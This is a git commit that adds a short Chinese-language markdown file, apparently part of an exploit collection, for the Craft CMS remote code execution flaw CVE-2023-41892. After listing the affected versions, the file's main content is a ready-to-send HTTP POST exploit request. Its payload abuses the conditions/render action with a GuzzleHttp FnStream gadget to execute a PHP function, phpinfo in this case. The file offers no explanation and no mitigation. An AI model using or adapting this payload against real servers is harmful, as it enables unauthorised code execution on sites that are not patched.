Create Craft CMS远程代码执行漏洞CVE-2023-41892.md

2023-09-26 12:45:55 +08:00 · 2023-09-26 12:45:55 +08:00 · 9714d96a1d
commit 9714d96a1d
parent a01d5baf12
1 changed files with 14 additions and 0 deletions
--- a/CMS远程代码执行漏洞CVE-2023-41892.md
+++ b/CMS远程代码执行漏洞CVE-2023-41892.md
@ -0,0 +1,14 @@
+## Craft CMS远程代码执行漏洞CVE-2023-41892
+
+## 影响版本
+Craft CMS >= 4.0.0-RC1
+Craft CMS <= 4.4.14
+
+## exp
+```
+POST /index.php HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded
+
+action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
+```